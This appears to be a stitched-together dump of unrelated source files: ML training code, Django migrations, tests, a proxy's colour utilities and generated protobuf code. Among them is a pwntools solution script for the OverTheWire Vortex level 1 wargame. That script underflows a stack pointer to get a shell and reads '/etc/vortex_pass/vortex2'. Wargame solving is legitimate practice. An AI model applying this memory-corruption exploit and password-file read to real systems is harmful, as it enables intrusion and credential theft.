value=[999999, 999999, h_steps[i][1], w_steps[j][1]])
nodes.extend([starts_node, ends_node])
slice_block_node = graph.make_node(
'Slice',
inputs=[node.input('X', 0), starts_node, ends_node])
flatten_block_node = graph.make_node(
"Flatten", inputs=[slice_block_node], axis=0)
nodes.extend([slice_block_node, flatten_block_node])
concat_block_node = graph.make_node(
"Concat",
inputs=slice_node_blocks,
outputs=node.output('Out'),
axis=0)
logging.info("==========Importance Notice===========")
logging.info(
"Since im2sequence operator is used in your paddlepaddle model, the translated onnx model only support input data with batch_size=1."
)
logging.info("======================================")
|
addons/bitbucket/tests/test_serializer.py
|
gaybro8777/osf.io
| 628 |
122371
|
<reponame>gaybro8777/osf.io
# -*- coding: utf-8 -*-
"""Serializer tests for the Bitbucket addon."""
import mock
from nose.tools import * # noqa (PEP8 asserts)
import pytest
from tests.base import OsfTestCase
from addons.bitbucket.api import BitbucketClient
from addons.bitbucket.tests.factories import BitbucketAccountFactory
from addons.bitbucket.serializer import BitbucketSerializer
from addons.base.tests.serializers import StorageAddonSerializerTestSuiteMixin
pytestmark = pytest.mark.django_db
class TestBitbucketSerializer(StorageAddonSerializerTestSuiteMixin, OsfTestCase):
addon_short_name = 'bitbucket'
Serializer = BitbucketSerializer
ExternalAccountFactory = BitbucketAccountFactory
client = BitbucketClient()
def set_provider_id(self, pid):
self.node_settings.repo = pid
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
zaltoprofen/chainer
| 3,705 |
122424
|
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*testing.product_dict(
[
{'shape': (), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 0, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant'},
{'shape': (2, 3, 2), 'pad_width': ((2, 5), (1, 2), (0, 7)),
'mode': 'constant'},
{'shape': (1, 3, 5, 2), 'pad_width': 2, 'mode': 'constant'}
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
class TestPadDefault(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, self.mode)
return y,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, self.mode)
return y_expected.astype(self.dtype),
@testing.parameterize(*testing.product_dict(
[
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant',
'constant_values': 1},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant',
'constant_values': (1, 2)},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant',
'constant_values': ((1, 2), (3, 4))},
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
# Old numpy does not work with multi-dimensional constant_values
@testing.with_requires('numpy>=1.11.1')
class TestPad(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y_expected,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y,
testing.run_module(__name__, __file__)
|
digest/migrations/0041_auto_20160401_1403.py
|
PURNA-ROCK/pythondigest
| 124 |
122443
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-01 14:03
from __future__ import unicode_literals
import taggit_autosuggest.managers
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('digest', '0040_auto_20160330_1616'),
]
operations = [
migrations.AlterField(
model_name='item',
name='keywords',
field=taggit_autosuggest.managers.TaggableManager(blank=True,
help_text='A comma-separated list of tags.',
through='digest.KeywordGFK',
to='digest.Keyword',
verbose_name='Keywords'),
),
]
|
corehq/apps/users/migrations/0030_userhistory_user_upload_record.py
|
akashkj/commcare-hq
| 471 |
122474
|
# Generated by Django 2.2.24 on 2021-07-02 13:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_importer', '0001_initial'),
('users', '0029_userhistory'),
]
operations = [
migrations.AddField(
model_name='userhistory',
name='user_upload_record',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL,
to='user_importer.UserUploadRecord'),
),
]
|
tests/conftest.py
|
billvsme/videoSpider
| 216 |
122478
|
import pytest
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from models import Base
from config import create_new_sqla
from helpers import (get_video_douban_ids,
get_celebrity_douban_ids,
get_animation_bilibili_ids)
test_database_url = 'sqlite:///test.db'
@pytest.fixture(scope='session')
def session(request):
sqla = create_new_sqla(test_database_url, echo=False)
session = sqla['session']
engine = sqla['engine']
Base.metadata.create_all(engine)
def teardown():
Base.metadata.drop_all(engine)
request.addfinalizer(teardown)
return session
@pytest.fixture
def douban_movie_ids():
return list(get_video_douban_ids())
@pytest.fixture
def douban_celebrity_ids():
return list(get_celebrity_douban_ids())
@pytest.fixture
def bilibili_animation_ids():
return list(get_animation_bilibili_ids())
|
syzygy/scripts/test_bot/chrome_page_load.py
|
nzeh/syzygy
| 343 |
122493
|
#!python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script for launching Chrome, having it load a set of pages, and then cleanly
shutting it down.
"""
# Standard modules.
import json
import optparse
import os
import sys
# Local modules.
import log_helper
# Modules from other locations in the repo.
_CUR_DIR = os.path.abspath(os.path.dirname(__file__))
_BENCHMARK_DIR = os.path.abspath(os.path.join(_CUR_DIR, '..', 'benchmark'))
_ETW_DB_DIR = os.path.abspath(os.path.join(_CUR_DIR, '..', '..', 'py',
'etw_db'))
_ETW_DIR = os.path.abspath(os.path.join(_CUR_DIR, '..', '..', '..',
'third_party', 'sawbuck', 'py', 'etw'))
sys.path.append(_BENCHMARK_DIR)
sys.path.append(_ETW_DB_DIR)
sys.path.append(_ETW_DIR)
import chrome_control
import runner
_LOGGER = log_helper.GetLogger(__file__)
def _ParseArgs():
"""Parses the command-line."""
parser = optparse.OptionParser(
'Usage: %prog [options] [url1 [url2 [ ... ]]]')
parser.add_option('--chrome-dir', help='Location of Chrome installation.')
parser.add_option('--iterations', default=1, type='int',
help='Number of iterations.')
parser.add_option('--url-list', help='File with list of URLs to be opened.')
opts, args = parser.parse_args()
if not opts.chrome_dir:
parser.error("Must specify --chrome-dir.")
return (opts, args)
def _GetUrlList(opts, args):
"""Gets the list of URLs to be loaded."""
urls = args
if opts.url_list:
_LOGGER.info('Loading list of URLs from \"%s\".', opts.url_list)
urls += open(opts.url_list, 'rb').readlines()
return urls
def main():
if sys.platform == 'win32':
# Don't show error dialog boxes on crashes or debug-breaks. This setting
# is inherited by child processes, so a crash won't block automated tests.
import ctypes
ctypes.windll.kernel32.SetErrorMode(3)
opts, args = _ParseArgs()
# Get the list of URLs and determine the startup type.
urls = _GetUrlList(opts, args)
startup_type = chrome_control.STARTUP_NEW_TAB_PAGE
if urls:
startup_type = chrome_control.STARTUP_RESTORE_SESSION
# Configure and launch the Chrome runner.
chrome_exe = os.path.abspath(os.path.join(opts.chrome_dir, 'chrome.exe'))
if not os.path.exists(chrome_exe):
raise Exception('File not found: %s' % chrome_exe)
chrome = runner.ChromeRunner(chrome_exe, None, True)
chrome.ConfigureStartup(startup_type, urls)
chrome.Run(opts.iterations)
return 0
if __name__ == '__main__':
sys.exit(main())
|
test/com/facebook/buck/features/python/testdata/python_binary/preload_deps/preload_order.py
|
Unknoob/buck
| 8,027 |
122520
|
import ctypes
ctypes.CDLL(None).func()
|
TransForm_Kit/DnsChannelpruning/channel_pruning.py
|
Abraham-Xu/TF2
| 144 |
122550
|
# Copyright 2019 Inspur Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import torch.nn as nn
import torch
import time
from parse_model import ParseModel
from find_dnscp_conv import *
from dnscp_core import DnscpCore
from utility import *
from model_convert import *
from finetune import validate
from finetune import train_val
''' dnscp train and val'''
def dnscp_train_val(train_loader, val_loader,model, InputShape,criterion, optimizer,args):
""" find connect layer! """
print('find connect layer begin...')
parse_model_instance = ParseModel()
layername_type_dict,layername_lainjie_dict = parse_model_instance.parse_model_caffe\
(model, InputShape, softmax = False)
print('find connect layer Done.')
""" find conv layer that needs to be pruned ! """
print('find pruned layer begin...')
conv_dnscp_flag_list = find_dnscp_conv(model,layername_type_dict,layername_lainjie_dict)
print('find pruned layer Done.')
print('conv_dnscp_flag:',conv_dnscp_flag_list)
print('train begin')
'''init dnscp core'''
net_dnscp = DnscpCore()
best_acc1 = 0
train_cp_stop_flag=False
is_best = False
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
adjust_learning_rate(optimizer, epoch, args)
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(train_loader),
[batch_time, data_time, losses, top1, top5],
prefix="Epoch: [{}]".format(epoch))
'''switch to train mode'''
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
'''measure data loading time'''
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
'''forward dnscp layer'''
iter = i+len(train_loader)*epoch
conv_param_before_cplist,conv_param_cpmasklist = \
net_dnscp.forward_dnscp_layer(model,conv_dnscp_flag_list,iter)
'''model forward'''
output = model(images)
'''measure accuracy and record loss'''
loss = criterion(output, target)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
''' compute gradient and do SGD step'''
optimizer.zero_grad()
loss.backward()
'''replace weight with cp before'''
conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
module.weight.data = conv_param_before_cplist[conv_index]
conv_index+=1
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0 or i % (len(train_loader)-1) == 0:
progress.display(i)
pruned_model = generate_prunedmodel(model,conv_dnscp_flag_list,conv_param_cpmasklist)
convparam_kept,convflops_kept = calculate_compress_rate(model,pruned_model,InputShape)
print("kept ratio:",convflops_kept)
'''control train epoch'''
'''if convflops_kept >= args.kept_ratio+0.2:
train_cp_stop_flag = True
if iter<10000:
print("please set kept ratio bigger than ",args.kept_ratio)
break'''
if iter % 2000 == 0:
pruned_model = generate_prunedmodel(model,conv_dnscp_flag_list,conv_param_cpmasklist)
convparam_kept,convflops_kept = calculate_compress_rate(model,pruned_model,InputShape)
'''evaluate on validation set'''
acc1 = dnscp_validate(val_loader, model, criterion, conv_param_cpmasklist,args)
if convflops_kept >= args.kept_ratio-0.05 and convflops_kept <= args.kept_ratio+0.05:
'''remember best acc@1 and save checkpoint'''
is_best = acc1 > best_acc1
best_acc1 = acc1
if not args.multiprocessing_distributed or (args.multiprocessing_distributed
and args.rank % ngpus_per_node == 0):
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'acc1': acc1,
'optimizer' : optimizer.state_dict(),
'mask':conv_param_cpmasklist,
'conv_cpflag':conv_dnscp_flag_list,
'kept_ratio':convflops_kept,
'iter':iter
}, is_best,args.snapshotmodelname)
is_best = False
if train_cp_stop_flag == True:
break
def dnscp_train(train_loader, model, criterion, optimizer, epoch,net_dnscp,conv_dnscp_flag,InputShape,args):
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(train_loader),
[batch_time, data_time, losses, top1, top5],
prefix="Epoch: [{}]".format(epoch))
train_cp_stop_flag=False
'''switch to train mode'''
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
'''measure data loading time'''
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
'''compute output'''
iter = i+len(train_loader)*epoch
#print("iter:",iter)
'''conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
if conv_index == 2:
print("ith weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
conv_index+=1'''
conv_param_before_cplist,conv_param_cpmasklist = net_dnscp.forward_dnscp_layer(model,conv_dnscp_flag,iter)
'''conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
if conv_index == 2:
print("ith mask weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
conv_index+=1'''
output = model(images)
loss = criterion(output, target)
'''measure accuracy and record loss'''
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
'''replace weight with cp before'''
conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
'''if conv_index == 2:
print("optimizer i+1 weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
print("grad:",module.weight.grad.cpu().numpy()[0,0:16,:,:])
print("before_update_mask weight data:",conv_param_before_cp[conv_index].cpu().numpy()[0,0:16,:,:])
print("before_update_mask weight data:",conv_param_before_cplist[conv_index].cpu().numpy()[0,0:16,:,:])'''
module.weight.data = conv_param_before_cplist[conv_index]
conv_index+=1
optimizer.step()
'''only print'''
'''conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
if conv_index == 2:
print("i+1 weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
print("grad:",module.weight.grad.cpu().numpy()[0,0:16,:,:])
print("before_update_mask weight data:",conv_param_before_cplist[conv_index].cpu().numpy()[0,0:16,:,:])
#module.weight.data = conv_param_before_cplist[conv_index]-args.lr*module.weight.grad
conv_index+=1'''
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0 or i % (len(train_loader)-1) == 0:
progress.display(i)
pruned_model = generate_prunedmodel(model,conv_dnscp_flag,conv_param_cpmasklist)
convparam_kept,convflops_kept = calculate_compress_rate(model,pruned_model,InputShape)
print("kept ratio:",convflops_kept)
if convflops_kept >= args.kept_ratio+0.02:
train_cp_stop_flag = True
break
#if i % (len(train_loader)//2) == 0 or i == len(train_loader):
###end simple test
return conv_param_cpmasklist,train_cp_stop_flag,convflops_kept
def dnscp_validate(val_loader, model, criterion, conv_param_cpmasklist,args):
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(val_loader),
[batch_time, losses, top1, top5],
prefix='Test: ')
# switch to evaluate mode
model.eval()
'''replace weight with weight*mask for forward'''
conv_index = 0
conv_param_nocp_list = []
for module in model.modules():
if isinstance(module,nn.Conv2d):
conv_param_nocp_list.append(module.weight.data)
#print(module.weight.data.shape,conv_param_cpmasklist[conv_index].shape)
module.weight.data = module.weight.data * conv_param_cpmasklist[conv_index]
conv_index+=1
with torch.no_grad():
end = time.time()
for i, (images, target) in enumerate(val_loader):
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.display(i)
# TODO: this should also be done with the ProgressMeter
print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
'''replace weight*mask with weight'''
conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
module.weight.data = conv_param_nocp_list[conv_index]
conv_index+=1
return top1.avg
|
tests/roots/test-ext-autodoc/target/empty_all.py
|
samdoran/sphinx
| 4,973 |
122571
|
"""
docsting of empty_all module.
"""
__all__ = []
def foo():
"""docstring"""
def bar():
"""docstring"""
def baz():
"""docstring"""
|
pappyproxy/colors.py
|
Jab2870/pappy-proxy
| 440 |
122580
|
<reponame>Jab2870/pappy-proxy
import re
import itertools
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
from pygments.lexers import get_lexer_for_mimetype, HttpLexer
from pygments.formatters import TerminalFormatter
def clen(s):
ansi_escape = re.compile(r'\x1b[^m]*m')
return len(ansi_escape.sub('', s))
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
# Effects
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# Colors
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
WHITE = '\033[37m'
# BG Colors
BGBLACK = '\033[40m'
BGRED = '\033[41m'
BGGREEN = '\033[42m'
BGYELLOW = '\033[43m'
BGBLUE = '\033[44m'
BGMAGENTA = '\033[45m'
BGCYAN = '\033[46m'
BGWHITE = '\033[47m'
# Light Colors
LBLACK = '\033[90m'
LRED = '\033[91m'
LGREEN = '\033[92m'
LYELLOW = '\033[93m'
LBLUE = '\033[94m'
LMAGENTA = '\033[95m'
LCYAN = '\033[96m'
LWHITE = '\033[97m'
class Styles:
################
# Request tables
TABLE_HEADER = Colors.BOLD+Colors.UNDERLINE
VERB_GET = Colors.CYAN
VERB_POST = Colors.YELLOW
VERB_OTHER = Colors.BLUE
STATUS_200 = Colors.CYAN
STATUS_300 = Colors.MAGENTA
STATUS_400 = Colors.YELLOW
STATUS_500 = Colors.RED
PATH_COLORS = [Colors.CYAN, Colors.BLUE]
KV_KEY = Colors.GREEN
KV_VAL = Colors.ENDC
UNPRINTABLE_DATA = Colors.CYAN
def verb_color(verb):
if verb and verb == 'GET':
return Styles.VERB_GET
elif verb and verb == 'POST':
return Styles.VERB_POST
else:
return Styles.VERB_OTHER
def scode_color(scode):
if scode and scode[0] == '2':
return Styles.STATUS_200
elif scode and scode[0] == '3':
return Styles.STATUS_300
elif scode and scode[0] == '4':
return Styles.STATUS_400
elif scode and scode[0] == '5':
return Styles.STATUS_500
else:
return Colors.ENDC
def path_formatter(path, width=-1):
if len(path) > width and width != -1:
path = path[:width]
path = path[:-3]+'...'
parts = path.split('/')
colparts = []
for p, c in zip(parts, itertools.cycle(Styles.PATH_COLORS)):
colparts.append(c+p+Colors.ENDC)
return '/'.join(colparts)
def color_string(s, color_only=False):
"""
Return the string with a a color/ENDC. The same string will always be the same color.
"""
from .util import str_hash_code
# Give each unique host a different color (ish)
if not s:
return ""
strcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
col = strcols[str_hash_code(s)%(len(strcols)-1)]
if color_only:
return col
else:
return col + s + Colors.ENDC
def pretty_msg(msg):
to_ret = pretty_headers(msg) + '\r\n' + pretty_body(msg)
return to_ret
def pretty_headers(msg):
to_ret = msg.headers_section()
to_ret = highlight(to_ret, HttpLexer(), TerminalFormatter())
return to_ret
def pretty_body(msg):
from .util import printable_data
to_ret = printable_data(msg.body, colors=False)
if 'content-type' in msg.headers:
try:
lexer = get_lexer_for_mimetype(msg.headers.get('content-type').split(';')[0])
to_ret = highlight(to_ret, lexer, TerminalFormatter())
except:
pass
return to_ret
def url_formatter(req, colored=False, always_have_path=False, explicit_path=False, explicit_port=False):
retstr = ''
if not req.use_tls:
if colored:
retstr += Colors.RED
retstr += 'http'
if colored:
retstr += Colors.ENDC
retstr += '://'
else:
retstr += 'https://'
if colored:
retstr += color_string(req.dest_host)
else:
retstr += req.dest_host
if not ((req.use_tls and req.dest_port == 443) or \
(not req.use_tls and req.dest_port == 80) or \
explicit_port):
if colored:
retstr += ':'
retstr += Colors.MAGENTA
retstr += str(req.dest_port)
retstr += Colors.ENDC
else:
retstr += ':{}'.format(req.dest_port)
if (req.url.path and req.url.path != '/') or always_have_path:
if colored:
retstr += path_formatter(req.url.path)
else:
retstr += req.url.path
if req.url.params:
retstr += '?'
params = req.url.params.split("&")
pairs = [tuple(param.split("=")) for param in params]
paramstrs = []
for k, v in pairs:
if colored:
paramstrs += (Colors.GREEN + '{}' + Colors.ENDC + '=' + Colors.LGREEN + '{}' + Colors.ENDC).format(k, v)
else:
paramstrs += '{}={}'.format(k, v)
retstr += '&'.join(paramstrs)
if req.url.fragment:
retstr += '#%s' % req.url.fragment
return retstr
|
pyti/moving_average_envelope.py
|
dibyajyotidash/https-github.com-kylejusticemagnuson-pyti
| 635 |
122627
|
<gh_stars>100-1000
from __future__ import absolute_import
from pyti.simple_moving_average import simple_moving_average as sma
def center_band(data, period):
"""
Center Band.
Formula:
SMA(data)
"""
cb = sma(data, period)
return cb
def upper_band(data, period, env_percentage):
"""
Upper Band.
Formula:
ub = cb(t) * (1 + env_percentage)
"""
cb = center_band(data, period)
ub = [val * (1 + float(env_percentage)) for val in cb]
return ub
def lower_band(data, period, env_percentage):
"""
Lower Band.
Formula:
lb = cb * (1 - env_percentage)
"""
cb = center_band(data, period)
lb = [val * (1 - float(env_percentage)) for val in cb]
return lb
|
ykdl/extractors/netease/__init__.py
|
panda-mute/ykdl
| 136 |
122633
|
# -*- coding: utf-8 -*-
def get_extractor(url):
if 'v.163.com/movie/' in url:
url = url.replace('v.163', 'open.163')
if 'cc.163' in url:
from . import livecc as s
elif 'live.163' in url:
from . import live as s
elif 'open.163' in url or '/opencourse/' in url:
from . import openc as s
elif 'music.163' in url:
from . import music as s
return s.get_extractor(url)
elif '3g.163' in url:
from . import m3g as s
else:
from . import video as s
return s.site, url
|
docker/examples/iris/xgboost_rpc/python/iris_pb2.py
|
smsahu/seldon-server
| 1,645 |
122650
|
<gh_stars>1000+
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: iris.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='iris.proto',
package='io.seldon.microservice.iris',
syntax='proto3',
serialized_pb=_b('\n\niris.proto\x12\x1bio.seldon.microservice.iris\"D\n\x12IrisPredictRequest\x12\n\n\x02\x66\x31\x18\x01 \x01(\x02\x12\n\n\x02\x66\x32\x18\x02 \x01(\x02\x12\n\n\x02\x66\x33\x18\x03 \x01(\x02\x12\n\n\x02\x66\x34\x18\x04 \x01(\x02\x42/\n\x1bio.seldon.microservice.irisB\x0eIrisClassifierP\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_IRISPREDICTREQUEST = _descriptor.Descriptor(
name='IrisPredictRequest',
full_name='io.seldon.microservice.iris.IrisPredictRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='f1', full_name='io.seldon.microservice.iris.IrisPredictRequest.f1', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='f2', full_name='io.seldon.microservice.iris.IrisPredictRequest.f2', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='f3', full_name='io.seldon.microservice.iris.IrisPredictRequest.f3', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='f4', full_name='io.seldon.microservice.iris.IrisPredictRequest.f4', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=43,
serialized_end=111,
)
DESCRIPTOR.message_types_by_name['IrisPredictRequest'] = _IRISPREDICTREQUEST
IrisPredictRequest = _reflection.GeneratedProtocolMessageType('IrisPredictRequest', (_message.Message,), dict(
DESCRIPTOR = _IRISPREDICTREQUEST,
__module__ = 'iris_pb2'
# @@protoc_insertion_point(class_scope:io.seldon.microservice.iris.IrisPredictRequest)
))
_sym_db.RegisterMessage(IrisPredictRequest)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\033io.seldon.microservice.irisB\016IrisClassifierP\001'))
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
# @@protoc_insertion_point(module_scope)
|
wargames/overthewire-vortex/level1/win.py
|
spchal/pwntools-write-ups
| 456 |
122659
|
#!/usr/bin/env python2
from pwn import *
import time
level = 1
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/<PASSWORD>%i' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
r = shell.run(binary)
# Stack layout looks like this:
# -00000214 ptr dd ?
# -00000210 char dd ?
# -0000020C buffer db 512 dup(?)
#
# We start out in the middle of buffer
off_buffer = -0x20c
off_ptr = -0x214
ptr = off_buffer+0x100
r.send('\\' * (ptr-off_ptr-3)) # Underflow PTR, -3 so we set the high byte.
r.send('\xca') # Write the byte
r.send('\\') # Move backward again to undo the ++
r.send('\xca') # Send any byte at all, triggers e()
r.clean()
time.sleep(1)
# Win
r.send('id\n')
log.success('id: %s' % r.recv().strip())
r.send('cat /etc/vortex_pass/vortex2\n')
password = r.recv().strip()
log.success('Password: %s' % password)
print password
|
yargy/tests/test_relations.py
|
xepozz/yargy
| 250 |
122675
|
<filename>yargy/tests/test_relations.py
from yargy import (
Parser,
rule,
and_,
)
from yargy.predicates import gram
from yargy.relations import (
main,
gnc_relation,
number_relation,
gender_relation
)
from yargy.interpretation import fact
def test_name():
Name = fact(
'Name',
['first', 'last']
)
gnc = gnc_relation()
FIRST = gram('Name').interpretation(
Name.first.inflected()
).match(gnc)
LAST = gram('Surn').interpretation(
Name.last.inflected()
).match(gnc)
NAME = rule(
FIRST,
LAST
).interpretation(Name)
parser = Parser(NAME)
match = parser.match('саше иванову')
assert match.fact == Name(first='саша', last='иванов')
match = parser.match('сашу иванову')
assert match.fact == Name(first='саша', last='иванова')
match = parser.match('сашу ивановой')
assert not match
def test_main():
relation = and_(
number_relation(),
gender_relation()
)
A = rule(
gram('Surn'),
main(gram('Name'))
).match(relation)
B = gram('VERB').match(relation)
AB = rule(A, B)
parser = Parser(AB)
match = parser.match('иванов иван стал')
assert match
match = parser.match('иванов иван стали')
assert not match
match = parser.match('ивановы иван стал')
assert match
|
html5validator/validator.py
|
adamchainz/html5validator
| 266 |
122711
|
<gh_stars>100-1000
